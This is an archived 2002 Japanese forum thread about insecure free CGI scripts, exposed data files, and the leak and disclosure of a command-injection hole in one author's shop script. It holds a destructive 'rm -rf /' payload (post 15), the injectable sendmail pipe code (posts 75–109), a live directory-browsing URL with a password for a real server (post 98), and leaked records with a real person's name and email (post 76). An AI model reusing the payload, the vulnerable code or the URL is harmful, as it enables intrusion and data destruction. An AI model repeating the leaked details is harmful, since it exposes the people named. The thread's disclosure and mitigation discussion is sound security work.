5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【CGI作者へ】データ流失の助長はやめて【おながい】

1 :山芳社員:02/07/01 12:09
ググルでアンケートのcgiを検索して、引っかかったものに、
デフォルトのデータファイル(***.dat)などを調べてみると、
50%くらいの確率で名前を変えておらずパーミッション設定もしてない。

フリーのCGIを使う人のレベルなんてたかが知れているから、CGI作成
の時に、データファイルの拡張子をplかcgiにしておくべきでしょう。
なぜ、殆んどのCGIはデータをtxtとかcsvとかdatにして配布するんですか?
お蔭でうちの会社は今大変です。

2 :山芳社員:02/07/01 12:09
ついでに自分で2ゲット

3 :名無しさん@お腹いっぱい。:02/07/01 12:20
>>1
ハゲシク腹違い
http://pc.2ch.net/php/

4 :山芳社員:02/07/01 12:29
すみませんでした。
向こうへ逝って来ます。

5 :山芳社員:02/07/01 12:33
お詫びのしるしに、お土産をおいておきます。
あなたも、もしかしたら被害者かも。
http://www.colors.ne.jp/~hhh/fvote/fvote.cgi

(このスレは削除依頼しときます)


6 :名無しさん@お腹いっぱい。:02/07/01 16:42
おまえの設定が悪いんだよ。
お前CGIをなめてんだろ。
なめんのはいいよ。
でもな、これだけは覚えとけ。
データ流出はお前の所為だ。
皆さんは、データ管理がしっかり出来る大人になりましょう。

7 :名無しさん@お腹いっぱい。:02/07/01 18:07
データファイルの名前を変えるなんて事は小手先の
解決策。HTTPサーバのほうで、拡張子.dat, .csvなどを
ダウンロードできないようにするのが本筋。


8 :名無しさん@お腹いっぱい。:02/07/01 18:17
拡張子.dat, .csvなどをダウンロードできないようにするなんてのは、
小手先の回避策。解決策じゃない。
httpd の公開ディレクトリの外に置け。アホばっかやな。

9 :名無しさん@お腹いっぱい。:02/07/01 21:53
>>8が最も正しい。
補足するとhttpd の公開ディレクトリの外というのは別マシンも含むぞ。

10 :名無しさん@お腹いっぱい。:02/07/01 22:15
同意だが、個人がプロバイダに設置する場合は
大抵ドキュメントルート外にファイル置けないでそ

11 :名無しさん@お腹いっぱい。:02/07/01 22:20
普通はホームディレクトリ(public_htmlの上)はアクセス可能だろ。
じゃなかったらメルで飛ばす、出来ないようだったらそんな所使うな。

12 :名無しさん@お腹いっぱい。:02/07/01 23:10
>>1見落としてたが、データファイルの拡張子をcgiにしろなんてひろめたヘボは誰だぁ。

13 :名無しさん@お腹いっぱい。:02/07/02 04:06
>>11 まぁ、そうだけど…

↓こんな対処方法もある

<FilesMatch "\.(csv|dat)$">
deny from all
</FilesMatch>

14 :名無しさん@お腹いっぱい。:02/07/02 04:13
そして、鯖をアップグレードした拍子に、
AllowOverride がデフォルトの none に戻って、
>>13 の設定が無効になるという罠くらい知っとけよ、糞鯖貸屋。

15 :名無しさん@お腹いっぱい。:02/07/02 04:19
>>12
データファイルの拡張子をcgiにするなんてトンでもないこと。
一件目、二件目の登録者が、こんな登録をしたらどうする?

#!/bin/csh
rm -rf /

16 :名無しさん@お腹いっぱい。:02/07/02 04:33
>>15
データの一行目に

#!/usr/bin/env perl

というダミーの行を入れておくとよいです。

17 :名無しさん@お腹いっぱい。:02/07/02 04:37
>>14(゚Д゚)ハァ?

18 :名無しさん@お腹いっぱい。:02/07/02 09:27
データファイルや、そのディレクトリを httpd には読ず、
CGI には読めるパーミッションにしておくのはどうよ?

小手先には違いないけど…

19 :名無しさん@お腹いっぱい。:02/07/02 09:42
>>15-16
その「データファイル」のパーミッションはいくつだい

20 :名無しさん@お腹いっぱい。:02/07/02 10:34
拡張子を scr にしとくてのはどうよ


21 :名無しさん@お腹いっぱい。:02/07/02 11:00
>>19
700

22 :名無しさん@お腹いっぱい。:02/07/02 11:04
ふつー600にするわな。

23 :名無しさん@お腹いっぱい。:02/07/02 11:16
>>18
CGIが所有者の権限で動いてたら600にするといい
otherで動いてたら606か666にしないと動かないから丸見え
元のCGIは名前、メアド、コメントは公開される仕様でデータが見えてもよかった
山芳のは見えるとまずい個人情報を扱うように改造したのがまずかった



24 :名無しさん@お腹いっぱい。:02/07/02 13:08
見 え る と ま ず い デ ー タ は Web の ネ ー ム ス ペ ー ス に 置 く な

25 :名無しさん@お腹いっぱい。:02/07/02 13:14
楽しみが減ってしまいます。

26 :名無しさん@お腹いっぱい。:02/07/02 13:33
> 大抵ドキュメントルート外にファイル置けないでそ

こういう糞鯖貸屋が問題の癌。

公開ディレクトリの外にファイルを置けない鯖貸屋のブラックリストがほすい。

おまいら、作ってください。
バガボンドでもいいです。おながいします。

27 :名無しさん@お腹いっぱい。:02/07/02 13:43
共 有 鯖 に は 機 密 デ ー タ 置 く な

28 :名無しさん@お腹いっぱい。:02/07/02 14:42
客がhttp://..... と打ってCSVを見たがるんだからdocument root以下にデータ置くなじゃねえ。
http://hoge:hoge@.... ぐらいにしとけばこの板の住民をよけるには十分では?


29 :名無しさん@お腹いっぱい。:02/07/02 14:54
>>28
設定ミスりやすくて危険
フェールセーフ発想のない鯖屋は氏ね

30 :名無しさん@お腹いっぱい。:02/07/02 15:03
>>28データ流出の危険性を書いて責任は客にあると覚書交わしとけば桶。
これでも見たがる客は氏ね。

31 :名無しさん@お腹いっぱい。:02/07/02 15:08
>>30
それじゃ借り手がいなくなる Yo

32 :名無しさん@お腹いっぱい。:02/07/02 15:15
じゃあ、これからは、流出事故が起きたら、鯖屋も晒すってことで、FA?

33 :名無しさん@お腹いっぱい。:02/07/02 15:22
そんなに難しいのか、その設定は。

34 :名無しさん@お腹いっぱい。:02/07/02 19:32
暇ならここにおいでよ
http://www.am.wakwak.com/~wild/cgi-bin/eb/ebs.cgi
エンドレスバトル
無料ネットゲーム
敷居は低いが駆け引き最高




35 :名無しさん@お腹いっぱい。:02/07/02 19:49
何故、高い金を払ってサーバを借りてまで
パーミッション設定などという、しみったれたことをせねばならぬのか。

36 :名無しさん@お腹いっぱい。:02/07/02 19:59
みんな鯖屋鯖屋っていうけど、
吹けば飛ぶようなチンケなWeb屋に出入りしてる
できそこないのドロップアウトのPGが責任者だからね。

リスク避けたいんだったら客がそれなりの金を積めばいい
というだけの話。

設定がどうとか言う問題じゃない。


37 :h076.p957.iij4u.or.jp:02/07/02 20:43
>>36
それを逝ってはお終いだべさぁ

38 :名無しさん@お腹いっぱい。:02/07/02 21:34
CGIプログラミングは、動くだけの物なら特別な技術持って無くてもでっち上げられるんで、
ふきだまっている最下層のPGにあたる確率高し。
さらにヘボが解説書いてヘボを養成するヘボヘボスパイラルが形成されてるから、晒すネタ
が枯渇する事は当分無いだろう。

39 :名無しさん@お腹いっぱい。:02/07/02 22:10
まあ色々出てるレスはそうなんだが、色々手を尽くして流出の可能性を潰して行くのは重要だろう。
その意味では>>1の提案は悪くない。

本当にセキュアにするんなら、住所まで入った個人情報をThe internetからダイレクトに入れる
サーバなんぞに吐き出さない事だな。しかもプレーンテキストで。

40 :名無しさん@お腹いっぱい。:02/07/02 22:38
>>39 >>15読んだの? 意味を理解せずエラーにするのは愚の骨頂。

41 :名無しさん@お腹いっぱい。:02/07/02 23:00
>>40
類推できないような名前にして、さらに拡張子をplにすればyo。
万が一の場合だから、滅多なことでサバーエラーは発生しないだろ。

その万が一の時に、データがみえるdatなどだった場合は、
データの回収なんかできない。
保険みたいなもんだ。

42 :名無しさん@お腹いっぱい。:02/07/02 23:31
だからなんでデータファイルに実行権与えてんだよ

43 :名無しさん@お腹いっぱい。:02/07/02 23:39
ここ読め
http://www.google.co.jp/search?q=cache:h9GSXkkEB70C:hccweb1.bai.ne.jp/siriasu/+%E5%88%9D%E5%BF%83%E8%80%85+%E3%83%91%E3%83%BC%E3%83%9F%E3%83%83%E3%82%B7%E3%83%A7%E3%83%B3&hl=ja&ie=UTF-8&inlang=ja


44 :名無しさん@お腹いっぱい。:02/07/03 00:37
>>15みたいな状況をを本気で考えてるならアフォとしか言いようが無い

45 :名無しさん@Emacs:02/07/03 00:42
>>44
は?

46 :名無しさん@お腹いっぱい。:02/07/03 00:44
つーかおまいらWebprog板でやれ

47 :名無しさん@お腹いっぱい。:02/07/03 08:32
>>42
データの最初と最後の部分を、エラーを起こさない短いプログラムにしとけばいいじゃん。


48 :47:02/07/03 08:33

そして、各データ行の先頭には # を埋め込むようにする。

49 :名無しさん@お腹いっぱい。:02/07/03 11:11
>>44
アフォでも事故を起こさせないためにどうするかって話だろ。
だから、アフォな事態が起きるような回避策ではダメってこと。

50 :名無しさん@お腹いっぱい。:02/07/03 11:30
http://pc.2ch.net/test/read.cgi/sec/1025028471/928という話もあるんで、
信じては逝けないCGI入門書の一覧でも作るか。
漏れは一冊も持ってないんで任せたぞ。 > >>51-

51 :名無しさん@お腹いっぱい。:02/07/04 13:50
666 に設定した結果ファイルを DocumentRoot 以下に置くのと、
*.cgi なんて名前のファイルが CGI から書き込み可になるのとどっちが危険だ、
と言われたら、生理的には後者の方がずっといやだぞ。
DocumentRoot に置いて見えちまうアホはそいつ限りの被害だが、
フールプルーフとしては、万が一の被害は後者の方が重大だと思う。
たとえば間違えて 777 にしちゃうとか。

52 :今更だが:02/07/04 14:12
>>6
微妙にワラタ

53 :名無しさん@お腹いっぱい。:02/07/05 23:50
http://www2q.biglobe.ne.jp/~terra/cgi/Permission.htm

54 :名無しさん@お腹いっぱい。:02/07/05 23:51
神降臨
http://pc.2ch.net/test/read.cgi/sec/1025671013/375-387n

55 :名無しさん@お腹いっぱい。:02/07/06 00:08
http://www2q.biglobe.ne.jp/~terra/cgi/checktest.htm
■お知らせとお願い
このコーナーに有るスクリプトは、必ずフリーウェアとして公開します。
人気が有るからと言って、シェアウェアにする事は決してありません。

56 :名無しさん@お腹いっぱい。:02/07/06 00:08
突っ込みどころ満載だな。じっくり見てみる。

57 :名無しさん@お腹いっぱい。:02/07/06 00:10
よくもまあ実メアドをホイホイ入力できるものだ。
性欲とは自分を見失わせるのか。恐ろしいや。
中には会社や大学のメアドが散見されるのが痛々しい。

58 :名無しさん@お腹いっぱい。:02/07/06 03:58
禿しく助長中
http://pc.2ch.net/test/read.cgi/sec/1025671013/398-

59 :名無しさん@お腹いっぱい。:02/07/07 00:31
terra様おながい
http://news.2ch.net/test/read.cgi/newsplus/1025955747/

60 :名無しさん@お腹いっぱい。:02/07/07 04:42
良く考えたら、デフォルトのファイル名のまま使っていたり、
カレントディレクトリの下に書き込んだりするように設定していたら、
そもそも動かないようにエラーチェックコードを書けばいいんだよな。
まあ、DocumentRoot 内にあるかどうかの判断は難しいと思うが、
カレントディレクトリの下かどうかくらいは判断がつくだろう。
カレントディレクトリの下にしか置けないのならば、
そんなプロバイダで使うなよ、ってメッセージを表示するのもありだと思うし。

61 :名無しさん@お腹いっぱい。:02/07/07 08:51
今回の出会い系のメアド流出に関する責任は、こんな感じだろう。

CGI作者(terra) 20% ---データファイルを、最低限別名にしたり別ディレクトリに置く必要性を明記しなかった)
設置者      50% ---重要な個人情報を扱うという意識に欠けていた。(安っぽいCGIに手を出し、データ管理もダメダメ)
利用者      30% ---そのようなずさんな場所に、本メアドをいともたやすく入力する危機意識の無さ。
 


62 :名無しさん@お腹いっぱい。:02/07/07 09:59
http://www2q.biglobe.ne.jp/~terra/cgi/download.htm

「当サイトのスクリプトを利用した事によるいかなる損害も私は一切の責任を負いません。」


63 :名無しさん@お腹いっぱい。:02/07/07 10:14
>>61
> 利用者      30% ---そのようなずさんな場所に、本メアドをいともたやすく入力する危機意識の無さ。

利用者は、他の利用者に対しては責任はない。流出に関する責任としては、設置者100%だよ。
ただ、流出による被害については、利用者個々人にも責任はある。


64 :名無しさん@お腹いっぱい。:02/07/07 10:43
http://www2q.biglobe.ne.jp/~terra/cgi/download.htm
>◆ダウンロード
>メール転送サービス、メールアドレス変換サービスをご利用のメールアドレスには送信できません。
>実際に存在しないメールサーバには転送しない設定になっています。
>また、ポストペットなどのお遊びメーラーでも受信できない場合が有ります。

フリーのメアドだとダウソできなかった
しかもホームページのアドレスも記入するようになっている
考えすぎかもしれないが、作者がCGI設置先のアドレスを知っていれば
個人情報の収集はいとも簡単


65 :名無しさん@お腹いっぱい。:02/07/07 11:28
>>64
というか、terra は糞スクリプトの利用者の連絡先を全部知っているわけだから、
今回の事件を知らせて対策するようにメールで連絡を取るのが開発者としての責任
ではないか?

66 :名無しさん@お腹いっぱい。:02/07/07 11:34
>>65
いや、例えばhttp://tryhp.dip.jp/order/から入ればwebshoplightは落とせるよ。
書籍にも添付してるようだし、全員は把握してないだろう。
こりゃjpcert,ipaに報告かな。

67 :名無しさん@お腹いっぱい。:02/07/07 11:42
>>64が書いてるページから誰がどのCGIをいつダウンロードしたかのリストが漏れてた。
ダウンロードした人のURLつきだから、このリストからさらに漏れ情報を
拾うこともできる。どうしよう。2357行あります。


68 :名無しさん@お腹いっぱい。:02/07/07 12:32
>>67 もう拾えない??

69 :名無しさん@お腹いっぱい。:02/07/07 12:48
わからん。ダウンロードした人達に連絡よろしこ >67

70 :67:02/07/07 14:24
よく見てみたら、あそこに設置してあるフォームから書き込まれたデータじゃ
ないっぽいなぁ。別の場所にもダウンロードフォームが設置してあるのかな?

ダウンロード種別ごと漏れ件数(w
857 WebShopお試し版
364 フリーマーケットお試し版
277 ハッピーバースデーお試し版
271 ハウジングサーチお試し版
252 ベストフレンドお試し版
193 ジュピターお試し版
142 レスポンスお試し版

>>68
まだ置いてあるよ。

71 :67= eAc1Adb240.tky.mesh.ad.jp:02/07/07 14:48
漏れた人たちに俺から連絡するのもアレだし、
作者にこっそり連絡するのはもっとアレなので、
サポート掲示板にタレコミしてきました。

72 :名無しさん@お腹いっぱい。:02/07/08 12:21
terraはmember.datに対し第666プロテクトを掛けた

73 :名無しさん@お腹いっぱい。:02/07/08 13:17
terra, IPA, jpcertにWebShopLightの任意コマンド実行デモを送りました。

74 :名無しさん@お腹いっぱい。:02/07/08 13:24

ttp://www.digicame.cc/gallery/i/i.cgi
■あなたのお名前の表示なしに作品やコメントの投稿できます
■ちょっとだけ本音の感想が聞けるかも…(恐い?聞きたい?)
ttp://www.digicame.cc/gallery/i/upppu.txt
ttp://www.digicame.cc/gallery/i/upppu.cnt

75 :名無しさん@お腹いっぱい。:02/07/08 13:56
あぅ terraのWebShopLightの対処法間違ってたわ。
if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }


76 :67:02/07/08 18:12
あれ、カキコ失敗しちゃった。二重レスになってたらスマソ。

えと、お試し版だけではなく、有料版をダウンロードしたリストも漏れてました。
260件25KB。中身はこんな感じ。

166,976500913,WebShop,WS0078,武田有司,yuuji7@sun.inforyoma.or.jp,http://www3.inforyoma.or.jp/terra2,一般
150,973234323,かんたんレシピ,RP0094,武田有司,yuuji7@sun.inforyoma.or.jp,http://www3.inforyoma.or.jp/terra2/,一般
149,973234323,ハッピーバースデー,BS0143,武田有司,yuuji7@sun.inforyoma.or.jp,http://www3.inforyoma.or.jp/terra2/,一般


77 :名無しさん@お腹いっぱい。:02/07/08 21:45
JPCERTから返事来ますた。terra様はまだ配布しとるですね。
次は阻止無に回収しろゴルァかな。

78 :67:02/07/08 23:37
もろ見えスレの方でURLがバレてしまいましたわ。出さないでおいたのに。

>>77
乙彼。
webshoplightにかぎらず、こいつのいろんなCGIで同じように
汚染チェックをサボってる可能性が高いね。XSSぐらいはボロボロ出てきそう。


79 :名無しさん@お腹いっぱい。:02/07/09 00:05
「パーミッションて何は」何度読んでも藁える。
http://www2q.biglobe.ne.jp/~terra/cgi/Permission.htm

80 :77:02/07/09 00:30
>>67 sendmail叩いてるのは全滅だろうね。

>>79 特に↓
> オーナーをはじめ、すべての訪問者に読み込み、書き込み、実行を許可「rwx = 7」するのは、セキュリティー上
> 多少問題が有る事は事実ですが、ディレクトリ事態が動作する訳ではなく、CGIが操作しているのですから
> CGIに問題が無ければそれほど心配する必要はありません。
ディレクトリとファイルではxビットの意味が違う事も知らないようだ。

http://www2q.biglobe.ne.jp/~terra/cgi/cgitext.htm
> CGIは命取り
> といってもあなたの命を盗る訳ではありませんが、前述のとおり、CGIは、あなたのパソコンではなく、
> サーバで実行されます。十分バグ取り(エラー削除)されていないスクリプトを実行したり、
> あいまいな知識で作成したスクリプトを実行させるとサーバがハングアップ(暴走)することもありえます。
> あなたは、あなたの加入しているプロバイダの数万、数十万の会員に迷惑をかけることになるのです。責任が取れますか?。
大丈夫です。「いかなる損害も私は一切の責任を負いません。」と書いておきますから。 (w

81 :名無しさん@お腹いっぱい。:02/07/09 01:26
>>80
> あなたは、あなたの加入しているプロバイダの数万、数十万の会員に迷惑をかけることになるのです。責任が取れますか?。
terra様は予言者?

82 :愛と死の名無しさん:02/07/09 01:48
否、「ノッツェ」に救われたかと・・・。


83 :名無しさん@お腹いっぱい。:02/07/09 01:54
今回の件について、terra タンの反応って何かあった?
表向きには全く沈黙?

せっかくだから、イイ感じの逆ギレきぼん>terra タン

84 :77:02/07/09 02:09
jpcertとIPAとterra神には同報で出しといた。
jpcertからも同報で返信されて来た。これでメル受け取ってないとは言わせん。 (w

85 :77:02/07/09 10:52
ソシムにメルしました。
----------------------------
前略

貴社より発売中の「すぐはじめる CGIでWebショップ」に外部から任意コマンド実行可能な
深刻なセキュリティーホールを発見しました。
筆者様,IPA殿,JPCERT殿には以下を送付済みです。
このセキュリティホールはCGIの設置者のみならず、サーバ全体に影響を及ぼすので、早急に
筆者様と連絡をとり、書籍の回収、または購入者への告知等必要な処理をとられることを期待
いたします。
調査したのはwebshoplightだけですが、他のsendmailを利用しているスクリプトにも同様の
セキュリティホールが存在しているものと思われます。

なお、下記のメールの攻撃例、緊急対応法は間違っております。
正しいものは筆者様に送付してあります。
<元メールカット>

86 :名無しさん@お腹いっぱい。:02/07/09 11:08
terra様と、info@fanta-g.netに送りますた。
---------------------------------------
前略
貴サイトにて配布中のterra様作wepshoplightに外部から任意コマンド実行可能な深刻な
セキュリティーホールを発見しました。
作者様,IPA殿,JPCERT殿には以下を送付済みです。
このセキュリティホールはCGIの設置者のみならず、サーバ全体に影響を及ぼすので、早急に
作者様に連絡をとり、ダウンロードを停止されることを期待いたします。
調査したのはwebshoplightだけですが、他のsendmailを利用しているスクリプトにも同様の
セキュリティホールが存在しているものと思われます。

なお、下記のメールの攻撃例、緊急対応法は間違っております。
正しいものは筆者様に送付してあります。

追伸:
貴サイトにて配布中のスクリプトはコピーライト表示が貴サイトのものに変えられています、
著作者人格権は移転てきないはずですが、作者様は承諾しているのでしょうか?
<元メールカット>


87 :名無しさん@お腹いっぱい。:02/07/09 11:11
よくよく見ればWebShopLightの問題のメール送信部分とほぼ同じものが
ttp://www2q.biglobe.ne.jp/~terra/cgi/henteko3.htm
ttp://www2q.biglobe.ne.jp/~terra/cgi/sendemail.pl
に晒されてた。terra以外の人間がこれをパクって穴つきCGIを作ってる可能性が…。


88 :名無しさん@お腹いっぱい。:02/07/09 11:22
良く見なくても予想できたけど最悪だね。
<form>と<input type=text name=email>で引っ掛けりゃいいのかな? 396の検索能力が欲しいところだ (w

89 :名無しさん@お腹いっぱい。:02/07/09 13:22
>>79
まぁ、世の中にはディレクトリを777、データを666にしないとうごかない
サーバはゴマンとあるから、あれでもいいだろ。有料レンタルサーバでも
sueEXECを入れていないやつはまだある。

ところで、穴付きCGIをそんな簡単に指摘しちゃだめよ。
やっぱ、実際に被害者がでるまでほったらかした方があとあとおもしろいよ。
それに、mailの穴は超有名なというかCGIの基本だから、そんなのいちいち
報告してもべつに有名ハッカーになれるわけでもないし・・・。
正直なところ、そんな超基本的なバグを一生懸命得意げに報告している姿には
むなしさを感じるな。

あ、わかってると思うけどプログラムのバグにつけ込んでアタックするのは
不正アクセスになるよ。CGIの穴を検証するときはかならず自分のマシンに
ローカルなサーバを立ててやるように。
terraのサイトとかほかのweb通販サイトで実験して一生を棒にふらないように。

90 :名無しさん@お腹いっぱい。:02/07/09 13:32
>>85
>>86
必死だな。
ビジネス文書としては0点。敬語の使い方わかってないな。

91 :77:02/07/09 13:53
fanta-g.netさんから配布停止するという連絡が来ますた。

>>89
無論ローカル鯖でやっただよ。
外部鯖でも通常の注文にしか見えないログしか残らんけどな。

>>90
ったりめーだろ。これを俺が使ってる鯖に設置されたらこっちも被害者だ。
ついでに騒ぎにしてヘボCGI作者を叩いて警鐘にするというのはある。
敬語の使い方がわかってないのは素直に認めよう。後学のために添削してくれ。

92 :名無しさん@お腹いっぱい。:02/07/09 14:07
>>91
>無論ローカル鯖でやっただよ。
>外部鯖でも通常の注文にしか見えないログしか残らんけどな。

あの、実行したシェルコマンドはすべてシスログに残るんですが。
それから、そのCGIの穴を突いてApacheがError 500を返してしまうと
エラーログにも残るんですが。しかも、エラーログってそんなに出ないから
すぐばれるんですが。

93 :名無しさん@お腹いっぱい。:02/07/09 14:39
>>92 おいおい(藁

>あの、実行したシェルコマンドはすべてシスログに残るんですが。
残らないし。

>それから、そのCGIの穴を突いてApacheがError 500を返してしまうと
返さないし。

94 :名無しさん@お腹いっぱい。:02/07/09 14:43
>>89
> それに、mailの穴は超有名なというかCGIの基本だから、そんなのいちいち
> 報告してもべつに有名ハッカーになれるわけでもないし・・・。

悦に入って報告するわけじゃないだろ? おまえはそうなのかもしれんが(プ

95 :名無しさん@お腹いっぱい。:02/07/09 18:01
>>85-94
♪けんかをやめて〜 ふたりをとめて〜
  わたしの〜ために〜 あらそ〜わ〜ないで〜

                         by terra

96 :名無しさん@お腹いっぱい。:02/07/09 18:05
今後の展開に期待
ttp://www2.inforyoma.or.jp/~terra/support/support.cgi?view=41837

個人情報漏れ あのに さん 7/9(火) 12:23
[x1.randmax.jp] Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.0.3705)

> すごい重大な事件のはずなのにまる一日たっても流出を止めてない
> ようですね。それだけの技術がないのか止める意志がないのか

自分の所のすらまだ止めてないですからねー・・・
正直あいた口がふさがりません。

ここでURLを晒さないとだめなののでしょうか?

97 :77:02/07/09 21:50
>>92
スマソ、エラーログには残らないけどメルとaccountに痕跡残るわ。
でも全部perlでやれば何をやったのかはばれない。 (w

> しかも、エラーログってそんなに出ないからすぐばれるんですが。
データファイルを.cgiにして妨害してくれている罠。 (w

98 :名無しさん@お腹いっぱい。:02/07/10 12:54
ttp://www2q.biglobe.ne.jp/~terra/cgi/webexplorer/webexplorer.cgi
↑これってどこからダウンロードできるの? セキュリティホール満載の予感。
てゆーか、こういうCGIの存在自体が穴。

ttp://www2q.biglobe.ne.jp/~terra/cgi/webexplorer/webexplorer.cgi?action=opendir&dir=/&pw=abc123
なぜか dead.letter が(藁

そして 23425.tmp


99 :98:02/07/10 13:00
おや、User-Agentで挙動を変えてるのかな?
Mozillaだと dead.letter は見えない。w3m だと見える。

100 :名無しさん@お腹いっぱい。:02/07/10 13:17
う〜む…なんというか…アホだな、こいつ。

101 :名無しさん@お腹いっぱい。:02/07/10 13:36
基礎知識の大切がよくわかりました。

102 :名無しさん@お腹いっぱい。:02/07/10 14:41
半端な知識が一番まずいという事がよくわかりました。

103 :名無しさん@お腹いっぱい。:02/07/10 17:05
なんでもそーだな。

104 :名無しさん@お腹いっぱい。:02/07/11 04:45

action=unlink (藁


105 :名無しさん@お腹いっぱい。:02/07/11 13:36
if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }

これは何故ダメなのかが分からないダメな漏れ
(''で囲めば文字列認識じゃなかったっけ...自信なし)

これならいい?↓ダメ?
open(MAIL, "| $nkf -j | $sendmail -f$returnadd -t");
print (MAIL "To: $in{'mail'}\r\n");

106 :名無しさん@お腹いっぱい。:02/07/11 14:05
× if (!open(MAIL,"| $sendmail $mailto")) { return(1); }
○ if (!open(MAIL,"| $sendmail '$mailto'")) { return(1); }
terra様が配ってるのは前者

107 :105:02/07/11 15:09
>>106
そうでしたか.
...terra様ったら...これで印税かせいでたと思うとイヤーな気分

108 :名無しさん@お腹いっぱい。:02/07/11 17:09
>>106
$mailto に「'」が含まれてたらどーなる?

109 :名無しさん@お腹いっぱい。:02/07/11 18:10
>>108
なるほど、
foreach $ml (@TO, @CC, @BCC) {
if ($ml =~ /([#-9A-~\-\_]+\@[#-9A-~\-\_\.]+)/) {
if ($i == 1) { $mailto = "$1"; }
else { $mailto .= "\,$1"; }
}
$i++;
}
駄目だね。

対応法: webshoplightを削除する。

110 :名無しさん@お腹いっぱい。:02/07/11 19:31
村西とおる DVD World
ttp://www.muranishi.tv/
ttp://cgi.muranishi.tv/user-cgi-bin/webshoplight.cgi

111 :名無しさん@お腹いっぱい。:02/07/11 20:32
ttp://www2q.biglobe.ne.jp/~terra/cgi/mailme/member.cgi?sex=0

大山 さん 2002年5月1日(水) 20時9分

重複チェック機能の確認結果。 ・・・そういう機能は組み込まれてないと判明。
氏名もメールアドレスも登録者のモラルに頼る方式ですね。 同一者の多重登
録や、なりすましもあり得る訳ですね。。。

北海道  1月1日生れ やぎ座

112 :名無しさん@お腹いっぱい。:02/07/12 02:27
$mailto =~ s/[^-_@.a-z0-9]//gi;
↑こうればいいのかな?

113 :名無しさん@お腹いっぱい。:02/07/12 13:29
読んでないのかシカトしているのか判らないけど、明日でメルうって一週間なので、サポートBBSで告知しよう。
実証コードはお盆明け予定。

114 :名無しさん@お腹いっぱい。:02/07/12 14:38
読んでてシカトなんじゃないかな。あのサポートBSSに毎日出てくるヤシ、
実は他人のふりして本人ってことはないかな?

115 :名無しさん@お腹いっぱい。:02/07/12 14:48
降臨されました。
http://www2.inforyoma.or.jp/~terra/support/support.cgi?view=41861

116 :(´∀` ) ◆mona.SiQ :02/07/12 17:59
ttp://www2.inforyoma.or.jp/~terra/cgi/download.dat

まだみれる
神terraは何にもわかってないだろ。

117 :名無しさん@お腹いっぱい。:02/07/12 23:37
terraタン3つのウソ

@
>「説明などしなくてもファイル名は変更していただける」と思いこんでいた
>ところが有ります。

自分ですらファイル名変更してないのに?(w

A
> 問題の多いものは削除するようにしているのですが、これも追いついていません。

消すくらい簡単だろうになあ。

B
>「フリーで公開しているのだから」という安易な気持ちがあったのかもしれません。

商売もしてた様ですが。。。

まあ、とにかく、まずはダウンロードしたユーザに告知することですね。
そのために連絡先集めたんだろうし。

118 :名無しさん@お腹いっぱい。:02/07/12 23:55
誰か、~terra様にここを教える気はないのですか?(キャッキャッ

119 :名無しさん@お腹いっぱい。:02/07/13 00:33
嘘を嘘と見抜ける人でないと、
terra作のプログラムを使うのは難しい。

120 :名無しさん@お腹いっぱい。:02/07/13 00:40
>>109
この方法で対策しる!
http://memo.st.ryukoku.ac.jp/archive/200206.month/4276.html

121 :名無しさん@お腹いっぱい。:02/07/13 02:39
>>120
なるほど、ちょっと賢くなった。

122 :名無しさん@お腹いっぱい。:02/07/13 07:26
ttp://www2q.biglobe.ne.jp/~terra/cgi/index.htm
お探しのページが見つかりませんでした。

ttp://www2.inforyoma.or.jp/~terra/
Forbidden
You don't have permission to access /~terra/ on this server.

123 :名無しさん@お腹いっぱい。:02/07/13 09:11
逃亡したもよう。

124 :名無しさん@お腹いっぱい。:02/07/13 09:42
あちゃ〜。ある意味最悪だぁね。自分の作ったのの責任取らないで、ケツまくって
逃げるっつ〜のは…

125 :名無しさん@お腹いっぱい。:02/07/13 10:03
飲むか飲まないかは客の自由な「やせる薬」
配りまくったあげく逃げ出す贋医者ってか?感じ悪すぎ

126 :名無しさん@お腹いっぱい。:02/07/13 10:30
>>120
open(FOO, "|-") || exec ...
の意味、しばらく悩んじまったけど、forkに失敗した時に想定外の動作になるので糞コード。
使い捨てスクリプトでならやるかも。

127 :名無しさん@お腹いっぱい。:02/07/13 14:11
ttp://www2q.biglobe.ne.jp/~terra/

128 :名無しさん@お腹いっぱい。:02/07/13 14:15
ttp://www.tryhp.net/

129 :名無しさん@お腹いっぱい。:02/07/13 14:29
ttp://www3.inforyoma.or.jp/sion/cgi-bin/bbs/windowbbs.cgi
ttp://www3.inforyoma.or.jp/sion/cgi-bin/bbs/powernote.cgi
すべての内容は日本の著作権法並びに国際条約により保護されています。
Copyright 2000 Terra. All rights reserved. No reproduction or republication without written

ttp://www3.inforyoma.or.jp/terra2/
ttp://www3.inforyoma.or.jp/terra2/cgi-bin/windowbbs/windowbbs.cgi
ttp://www3.inforyoma.or.jp/terra2/cgi-bin/bbs/powernote.cgi
当サイトに掲載の記事、写真の無断転載を禁じます。すべての内容は日本の著作権法並びに
国際条約により保護されています。(リンク、広告掲載については「その他のサービス」ページへ)
Copyright 2000 Terra. All rights reserved. No reproduction or republication without written

ttp://www3.inforyoma.or.jp/terra2/public_html/otoiawase.htm
Navi 高知について、ご意見ご希望などありましたらお願いします。
お問い合わせなどは、下記お問い合わせフォームでお願いします。

ttp://www.socym.co.jp/pages/books_annai/pc_inet_1.html
Webスクリプトの最高峰!
Try The HomePage最新プレミアムCGI集
すぐはじめる CGIでWebショップ

130 :(´∀` ) ◆mona.SiQ :02/07/13 17:25
お詫び
今回、当サイトのセキュリティの甘さからご利用いただいた一部の方々の個人情報(E-Mail)
が流出してしまった可能性が有る事が判明しました。
また、この事をいち速くお知らせいただいたにもかかわらず、対応が遅れてしまった事も
管理者である私の責任です。
メディアでも報道されているように、いろんなところで「個人情報の流出」が問題にされて
いる中、CGIを紹介しているサイトとしては弁解の余地も有りません。

この場をお借りして深くお詫びいたします。




131 :(´∀` ) ◆mona.SiQ :02/07/13 17:25
いろいろと考えさせていただきましたが、今回はセキュリティの問題を解決する事が先決
と考え、一度サイトを閉鎖させていただき、私どもの意識改革を含め二度とこのような事
の無いよう出直したいと思います。

長い間ご利用いただきありがとうございました。
当サイトがご紹介したスクリプトが少しでもお役に立てた方がいらっしゃれば幸いです。

引き続き、書籍で紹介したスクリプトの修正版や、有料でご利用いただいているスクリプ
トのサポートは行っていきます。
もう少しお時間をください。

 今回のことをお教えいただいた方々を始め、サイトの運営にご協力いただいた多くの
